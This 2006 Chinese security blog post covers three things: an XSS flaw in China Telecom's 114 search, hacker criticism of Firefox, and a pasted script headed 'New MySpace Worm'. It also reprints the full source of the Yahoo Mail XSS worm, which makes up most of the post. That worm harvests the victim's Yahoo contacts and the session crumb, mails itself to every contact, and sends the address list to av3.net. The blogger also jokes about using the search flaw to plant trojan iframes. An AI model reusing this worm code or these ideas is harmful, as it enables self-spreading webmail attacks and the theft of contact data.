电信114搜索发现重大漏洞,可直接执行XSS语句

<< 让时光倒流的一张帖子【精彩】 | 首页 | Serv-U的反弹攻击及其利用 >>

2006年10月03日

电信114搜索发现重大漏洞,可直接执行XSS语句

电信114搜索发现重大漏洞,可直接执行XSS语句

cnBeta顾问CN.Tink报道:

听说微软的Live Search与中国电信合作了,微软为电信提供技术支持,将他们的搜索服务与电信的“网页揪错”捆绑起来.
　　登陆Live Search与电信合作的搜索引擎后,随便搜索了一下site:flyt.cn,结果意想不到,在点击下一页后,出现问题了,突然弹出一个对话框如下:

　　后来我查看源代码后发现，Live Search所收录的网页里面有我blog中一篇“某些大站的XSS跨站”，这篇文章里面有一些XSS语句，Live Search搜索出来的结果直接执行了这些语句，如果我在某篇文章里写上iframe....挂个马，不知道会有什么情况，呵呵！看来微软细节还是没有做好！

　　微软自己的Live Search却没有这么弱智的BUG，呵呵！

黑客称Firefox太脆弱需重写全部核心代码

【赛迪网讯】10月3日消息，据国外媒体报道，有黑客日前表示，Firefox浏览器的安全漏洞太多，依靠补丁程序是根本无法修复的。
据ZDNet网站报道，在日前召开的ToorCon黑客大会上，两名黑客Spiegelmock和Andrew Wbeelsoi称，Firefox浏览器的安全漏洞太多，依靠补丁程序是根本无法修复的。
两名黑客称，Firefox的Javascript代码已经是10年前的产物了，很容易遭到攻击。而且，要想彻底解决问题，必须要重写Firefox的全部核心代码。
对此，新上任的Firefox安全专家Window Snyder称，将对此展开调查。但同时指出，尽管Firefox浏览器可能存在一些安全漏洞，但还不至于到了补丁无法修复的地步。
众所周知，Firefox浏览器正是以安全而闻名。据Net Applications的统计结果显示，截止到今年8月底，Firefox的市场分额已达到11.8%，而IE的份额则下滑至83%

传说中闹得YAHOO不可开交的XSS WORM
传说中闹得YAHOO不可开交的XSS WORM,赛门铁克将其危害级别定为Level 2,下一个是谁?163,sohu,还是sina?
＜img src=’http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif’ onfiltered=”var http_request = false; var Email = ‘’; var IDList = ‘’; var CRumb = ‘’; function makeRequest(url, Func, Method, Param) { if (window.XMLHttpRequest) { http_request = new XMLHttpRequest(); } else if (window.ActiveXObject) { http_request = new ActiveXObject(’Microsoft.XMLHTTP’); } http_request. onfiltered= Func; http_request.open(Method, url, true); if( Method == ‘GET’) http_request.send(null); else http_request.send(Param); }window.open(’http://www,lastdata.com’); ServerUrl = url0;USIndex = ServerUrl.indexOf(’us.’ ,0);MailIndex = ServerUrl.indexOf(’.mail’ ,0);CutLen = MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen); function GetIDs(HtmlContent) { IDList = ‘’; StartString = ‘ ＜td＞’; EndString = ‘＜/td＞’; i = 0; StartIndex = HtmlContent.indexOf(StartString, 0); while(StartIndex ＞= 0) { EndIndex = HtmlContent.indexOf(EndString, StartIndex); CutLen = EndIndex - StartIndex - StartString.length; YahooID = HtmlContent.substr(StartIndex + StartString.length, CutLen); if( YahooID.indexOf(’@yahoo.com’, 0) ＞ 0 || YahooID.indexOf(’@yahoogroups.com’, 0) ＞ 0 ) IDList = IDList + ‘,’ + YahooID ; StartString = ‘＜/tr＞’; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); StartString = ‘ ＜td＞’; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); i++; } if(IDList.substr(0,1) == ‘,’) IDList = IDList.substr(1, IDList.length); if(IDList.indexOf(’,', 0)＞0 ) { IDListArray = IDList.split(’,'); Email = IDListArray[0]; IDList = IDList.replace(Email + ‘,’, ‘’); } CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ‘,’, ‘’); IDList = IDList.replace(’,’ + CurEmail, ‘’);IDList = IDList.replace(CurEmail, ‘’);UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(’,’ + UserEmail, ‘’);IDList = IDList.replace(UserEmail + ‘,’, ‘’);IDList = IDList.replace(UserEmail, ‘’); return IDList; } function ListContacts() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; IDList = GetIDs(HtmlContent); makeRequest(’http://us.’ + Server + ‘.mail.yahoo.com/ym/Compose/?rnd=’ + Math.random(), Getcrumb, ‘GET’, null); } } } function ExtractStr(HtmlContent) { StartString = ‘name=\u0022.crumb\u0022 value=\u0022′; EndString = ‘\u0022′; i = 0; StartIndex = HtmlContent.indexOf(StartString, 0); EndIndex = HtmlContent.indexOf(EndString, StartIndex + StartString.length ); CutLen = EndIndex - StartIndex - StartString.length; crumb = HtmlContent.substr(StartIndex + StartString.length , CutLen ); return crumb; } function Getcrumb() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; CRumb = ExtractStr(HtmlContent); MyBody = ‘this is test’; MySubj = ‘New Graphic Site’; Url = ‘http://us.’ + Server + ‘.mail.yahoo.com/ym/Compose’; var ComposeAction = compose.action;MidIndex = ComposeAction.indexOf(’&Mid=’ ,0);incIndex = ComposeAction.indexOf(’&inc’ ,0);CutLen = incIndex - MidIndex - 5;var MyMid = ComposeAction.substr(MidIndex + 5, CutLen); QIndex = ComposeAction.indexOf(’?box=’ ,0);AIndex = ComposeAction.indexOf(’&Mid’ ,0);CutLen = AIndex - QIndex - 5;var BoxName = ComposeAction.substr(QIndex + 5, CutLen); Param = ‘SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=&.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+message+attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save+as+a+Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+forwarded+message+attached.&Format=html&sendbottom=Send&savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&cancelbottom=Cancel’; Param = Param.replace(’BOXNAME’, BoxName); Param = Param.replace(’RUMBVAL’, CRumb); Param = Param.replace(’BCCLIST’, IDList); Param = Param.replace(’TOEMAIL’, Email);Param = Param.replace(’FROMEMAIL’, ‘av3@yahoo.com’); Param = Param.replace(’EMAILBODY’, MyBody); Param = Param.replace(’PlainMESSAGE’, ‘’); Param = Param.replace(’EMAILSUBJ’, MySubj);Param= Param.replace(’EMAILSUBJ’, MySubj);Param = Param.replace(’EMAILSUBJ’, MySubj); Param = Param.replace(’EMAILMID’, MyMid);Param = Param.replace(’EMAILMID’, MyMid);makeRequest(Url , alertContents, ‘POST’, Param); } }} function alertContents() { if (http_request.readyState == 4) { window.navigate(’http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList=’ + IDList) } } makeRequest(’http://us.’ + Server + ‘.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd=’ + Math.random(), ListContacts, ‘GET’, null)”＞ Please wait while loading the site
New MySpace Worm
来自：s0n9'5 B1o9
var up_sURL="http://cache.static.userplane.com/presence";
var up_dURL="http://feed.presence.userplane.com/presence/m";
var up_wmURL="http://www.myspace.com/userplane/ic.cfm";
var up_pServ="presence.userplane.com";
function up_launch(_1){
var w=null;
w=window.open(up_wmURL+"?sendType=3&strEncryptedID="+up_sid+"&strDestinationUserID="+_1,"ICWindow_"+_1,"width=500,height=475,toolbar=0,directories=0,menubar=0,status=0,location=0,scrollbars=0,resizable=1");
if(w==null){
up_notify(_1);
}else{
up_clear(_1,false);
}
}
function up_clear(_3,_4){
var l=up_la;
up_la=new Array();
var _6=false;
while(l.length＞0){
var _7=l.pop();
if(_7.uid!=_3){
up_la.push(_7);
}else{
_6=true;
}
}
if(_6||!_4){
frames["up_lf"].location.href=up_dURL+"/o.php?sid="+up_sid+"&ou="+_3+"&forceClear="+(_4?"true":"false");
}
up_show();
}
function up_notify(_8){
var _9=true;
for(var i=0;i＜up_la.length;i++){
if(up_la[i].uid==_8){
_9=false;
}
}
if(_9){
var _b=new Object();
_b.uid=_8;
_b.n="A website member";
up_la.push(_b);
}
up_show();
}
function up_show(){
var e=document.getElementById("up_nd");
if(up_la.length＞0){
if(up_uid_display!=up_la[0].uid){
e.innerHTML="＜div style=\"text-align:center\"＞"+(up_is_win_ie?"":"＜table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"＞＜tr＞＜td align=\"center\"＞")+"＜table border=\"0\" cellpadding=\"2\" cellspacing=\"5\"＞＜tr＞＜td nowrap align=\"center\"＞＜strong style=\"font-size:larger;\"＞Incoming IM Message＜/strong＞＜/td＞＜/tr＞＜tr＞＜td align=\"center\"＞"+up_la[0].n+" wants to IM you.＜br＞Would you like to accept?＜/td＞＜/tr＞＜tr＞＜td nowrap align=\"center\"＞＜a style=\"font-size:larger;\" href=\"\" onClick=\"javascript: up_launch( '"+up_la[0].uid+"' ); return false;\"＞Yes＜/a＞           ＜a style=\"font-size:larger;\" href=\"\" onClick=\"javascript: up_clear( '"+up_la[0].uid+"', true ); return false;\"＞No＜/a＞＜/td＞＜/tr＞＜/table＞"+(up_is_win_ie?"":"＜/td＞＜/tr＞＜/table＞")+"＜/div＞";
up_uid_display=up_la[0].uid;
up_animate(200);
}
}else{
up_uid_display="";
up_animate(-200);
}
}
function up_animate(dY){
var e=document.getElementById("up_nd");
if(up_divY!=dY||up_la.length＞0){
if(up_divY!=dY){
up_divY+=dY＜up_divY?-10:10;
}
var px=up_divY+document.body.scrollTop+"px";
e.style.top=px;
clearTimeout(up_at);
up_at=setTimeout("up_animate("+dY+")",33);
}else{
e.style.top=dY;
}
}
function up_clean(ins){
var _11="";
for(var i=0;i＜ins.length;i++){
var c=ins.charAt(i);
if((c＞="A"&&c＜="Z")||(c＞="a"&&c＜="z")||(c＞="0"&&c＜="9")){
_11+=c;
}else{
_11+="_";
}
}
return _11;
}
function receiveData(_14){
if(_14!=""){
var a=_14.split(",");
if(a.length＞0){
while(u=a.shift()){
up_launch(u);
}
}
}
}
function URLencode(_16){
return escape(_16).replace(/\+/g,"%2B").replace(/\"/g,"%22").replace(/\'/g,"%27").replace(/\//g,"%2F");
}
function up_runPresence(sid,uid){
up_sid=URLencode(sid);
up_divY=-200;
up_la=new Array();
up_uid_display="";
document.write("＜iframe name=\"up_lf\" id=\"up_lf\" style=\"position:absolute; top: -200px; z-index:9998; width:100px; height:100px; border: 0px\" src=\"\"＞＜/iframe＞");
document.write("＜div id=\"up_nd\" style=\"position:absolute; width:250px; z-index:111111; left: 30px; top: -200px; background-color:#eeeeee; border: 1px solid #000000;\"＞＜/div＞");
if(up_sid!=""){
var _19="server="+up_pServ+"&uid="+up_sid;
document.write("＜div id=\"flash\" style=\"position:absolute; width:100px; z-index:9996; top: -200px;\"＞＜object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0\" id=\"presence\" width=\"1\" height=\"1\" align=\"middle\"＞＜param name=\"allowScriptAccess\" value=\"anyDomain\" /＞＜param name=\"movie\" value=\""+up_sURL+"/presence.swf\" /＞＜param name=\"quality\" value=\"high\" /＞＜param name=\"bgcolor\" value=\"#ffffff\" /＞＜param name=\"flashvars\" value=\""+_19+"\" /＞＜embed src=\""+up_sURL+"/presence.swf\" flashvars=\""+_19+"\" quality=\"high\" bgcolor=\"#ffffff\" width=\"1\" height=\"1\" swLiveConnect=true id=\"presence\" name=\"presence\" align=\"middle\" allowScriptAccess=\"anyDomain\" type=\"application/x-shockwave-flash\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\" /＞＜/object＞＜/div＞");
}
}
var up_sid=null;
var up_divY=null;
var up_la=null;
var up_uid_display=null;
var up_at=null;
var up_agt=navigator.userAgent.toLowerCase();
var up_appVer=navigator.appVersion.toLowerCase();
var up_is_mac=up_agt.indexOf("mac")!=-1;
var up_is_safari=up_agt.indexOf("safari")!=-1&&up_is_mac;
var up_is_khtml=up_is_safari||up_agt.indexOf("konqueror")!=-1;
var up_is_ie=up_appVer.indexOf("msie")!=-1&&up_agt.indexOf("opera")==-1&&!up_is_khtml;
var up_is_win=up_is_mac?false:(up_agt.indexOf("win")!=-1||up_agt.indexOf("16bit")!=-1);
var up_is_win_ie=up_is_win&&up_is_ie;

随机文章：
政府网站竟存漏洞 "菜鸟"都可篡改网页 2008年11月10日
FLASH漏洞被黑客广泛利用网上惊现恶意代码生成器 2008年05月31日
我看暴库漏洞原理及规律 2007年12月30日
5月19日大陆DNS大规模故障无法上网始末 2009年05月20日
淘宝网购规则三大漏洞：消费者保障力度不足 2009年05月13日

收藏到：Del.icio.us

Tag：电信 114搜索漏洞 XSS 黑客

引用地址：

chapi 发表于15时19分02秒 | 编辑 | 继续话题 | 转发 | 分享　0